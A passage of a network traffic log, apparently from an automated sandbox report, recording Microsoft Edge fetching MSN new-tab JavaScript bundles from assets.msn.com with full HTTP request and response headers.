report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/feedback-dialog.587b66732fd5b0175502.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/feedback-dialog.587b66732fd5b0175502.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: PgfWgbDNySzru/6tT1cubA==
last-modified: Tue, 20 Dec 2022 05:42:23 GMT
etag: 0x8DAE24CF84AFA8A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: de870104-a01e-00e6-475c-14e2e3000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:19 GMT
akamai-request-bc: [a=88.221.24.111,b=431581079,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=46, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b96797
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/FeedNavHeaderData.599a3827c3bf66e36e86.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/FeedNavHeaderData.599a3827c3bf66e36e86.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: BpniHyt1iePksiFe666iAg==
last-modified: Fri, 16 Dec 2022 21:57:10 GMT
etag: 0x8DADFB07B819A34
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 22da6d5f-b01e-00ab-2c75-13eee9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:20 GMT
akamai-request-bc: [a=88.221.24.111,b=431581758,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=26, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b96a3e
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/game-card.9e09d6dab71642fd4787.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/game-card.9e09d6dab71642fd4787.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 4NF2NQO29+bY4iOMnOQBWA==
last-modified: Fri, 16 Dec 2022 21:57:05 GMT
etag: 0x8DADFB078A12D35
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1c199716-f01e-00eb-7e75-133df8000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:20 GMT
akamai-request-bc: [a=88.221.24.111,b=431581891,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=31, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b96ac3
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/gaming-compete-card.ba57c1a3f940ac801bbf.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/gaming-compete-card.ba57c1a3f940ac801bbf.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 0nBqv5Jk4shX/v6TEHnVLw==
last-modified: Tue, 20 Dec 2022 05:42:18 GMT
etag: 0x8DAE24CF53CA66D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2fbd0a75-f01e-00bf-4160-14f2c3000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:20 GMT
akamai-request-bc: [a=88.221.24.111,b=431582487,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=22, clienttt; dur=1, origin; dur=0 , cdntime; dur=1
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b96d17
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/gaming-discover-strip.7d54bea3737a98214ac3.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/gaming-discover-strip.7d54bea3737a98214ac3.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: +nn5N80fRB6Ww5TgY5HjVA==
last-modified: Tue, 20 Dec 2022 05:42:22 GMT
etag: 0x8DAE24CF7AED166
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 621f6418-901e-0001-7b5a-14269a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:20 GMT
akamai-request-bc: [a=88.221.24.111,b=431582680,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b96dd8
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/gaming-match-card.26c9ae01280ca90596e9.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/gaming-match-card.26c9ae01280ca90596e9.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: StRijpMGSE6PqLG7C/yuuA==
last-modified: Tue, 20 Dec 2022 05:42:23 GMT
etag: 0x8DAE24CF7EF7A75
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: af6007d6-801e-0060-545c-144fba000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:20 GMT
akamai-request-bc: [a=88.221.24.111,b=431582863,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=23, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b96e8f
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/gaming-media-carousel.cf0f03c5a0eed2c589dd.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/gaming-media-carousel.cf0f03c5a0eed2c589dd.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: QKgk6oyxwqFUYO5vv/WhCw==
last-modified: Tue, 20 Dec 2022 05:42:23 GMT
etag: 0x8DAE24CF7E1C0D4
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: dd185650-901e-00c1-715d-14a2de000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:21 GMT
akamai-request-bc: [a=88.221.24.111,b=431583087,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=34, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b96f6f
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/gaming-personalization-card.62461b12b3b48fe42757.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/gaming-personalization-card.62461b12b3b48fe42757.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 7IDWMW1ghKrLHAm/N/T62w==
last-modified: Fri, 16 Dec 2022 21:57:04 GMT
etag: 0x8DADFB0779C8D8D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ba38dc0c-b01e-003f-7d00-14a596000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:21 GMT
akamai-request-bc: [a=88.221.24.111,b=431583342,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=25, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9706e
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/gaming-recentlyplayed-card.0bdcd24857ce351c11a0.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/gaming-recentlyplayed-card.0bdcd24857ce351c11a0.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 5YvNj0J5kjH+qv1J8mbphQ==
last-modified: Tue, 20 Dec 2022 05:42:19 GMT
etag: 0x8DAE24CF59A4920
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 25a22070-b01e-00c3-365c-14f4da000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:21 GMT
akamai-request-bc: [a=88.221.24.111,b=431583447,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=20, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b970d7
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/gaming-recommended-card.be8347ed243d9990b200.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/gaming-recommended-card.be8347ed243d9990b200.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 9DT4tFI0TWMNzeIiLKLDsg==
last-modified: Tue, 20 Dec 2022 05:42:22 GMT
etag: 0x8DAE24CF7B49CEB
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3b6f8eb9-901e-0079-315a-148c8b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:21 GMT
akamai-request-bc: [a=88.221.24.111,b=431583530,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9712a
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/gaming-reddit-card.d515b4fb2915747a57f6.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/gaming-reddit-card.d515b4fb2915747a57f6.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: R3/kn7OlDG7DQPySAWYVXQ==
last-modified: Tue, 20 Dec 2022 23:56:02 GMT
etag: 0x8DAE2E5C047C0A1
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: dfc06b9e-001e-0054-4c46-19c2a3000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:21 GMT
akamai-request-bc: [a=88.221.24.111,b=431583748,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=28, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b97204
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/gaming-rewards-card.68ea4bca9b738a5c05bd.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/gaming-rewards-card.68ea4bca9b738a5c05bd.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: iG5qTktjqzLJ6li1RyWCiQ==
last-modified: Tue, 20 Dec 2022 05:42:19 GMT
etag: 0x8DAE24CF58E15F3
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: bfb0b1b0-701e-00df-6d5c-14b0e1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:21 GMT
akamai-request-bc: [a=88.221.24.111,b=431584093,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=20, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9735d
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/gaming-stream-card.cc7ed914266b41c952eb.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/gaming-stream-card.cc7ed914266b41c952eb.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: jUIDGndq2Ifp3oYNV+mHXw==
last-modified: Tue, 20 Dec 2022 23:56:04 GMT
etag: 0x8DAE2E5C170D2DA
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6acb8212-001e-003c-1835-1cd890000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:21 GMT
akamai-request-bc: [a=88.221.24.111,b=431584267,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=29, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9740b
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/gaming-tournament-card.1725b6e7e6b2cb2f3e0d.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/gaming-tournament-card.1725b6e7e6b2cb2f3e0d.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: gYjayfatUdO+OAR1UxSgqw==
last-modified: Fri, 16 Dec 2022 21:57:04 GMT
etag: 0x8DADFB077FFADAB
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ae77e9ad-101e-00e5-039b-139fe5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:22 GMT
akamai-request-bc: [a=88.221.24.111,b=431584544,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=20, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b97520
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/gaming-upcoming-card.23698fb9c3e093825cfc.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/gaming-upcoming-card.23698fb9c3e093825cfc.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: ykhmPqIAa135BJBxDDm3BQ==
last-modified: Tue, 20 Dec 2022 05:42:22 GMT
etag: 0x8DAE24CF743EA3B
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: dd188092-901e-00c1-6e5d-14a2de000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:22 GMT
akamai-request-bc: [a=88.221.24.111,b=431584825,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b97639
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/gaming-video-card.74134d2e65813cf2f018.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/gaming-video-card.74134d2e65813cf2f018.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: h9iaDtBE0PwVhxdp9Y5VkQ==
last-modified: Tue, 20 Dec 2022 05:42:19 GMT
etag: 0x8DAE24CF5C4392D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 85435783-f01e-002b-3e5c-14b9bc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:22 GMT
akamai-request-bc: [a=88.221.24.111,b=431585036,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9770c
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/general-elections.6c85b4ca4c30f23f462e.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/general-elections.6c85b4ca4c30f23f462e.js HTTP/2.0
host: assets.msn.com
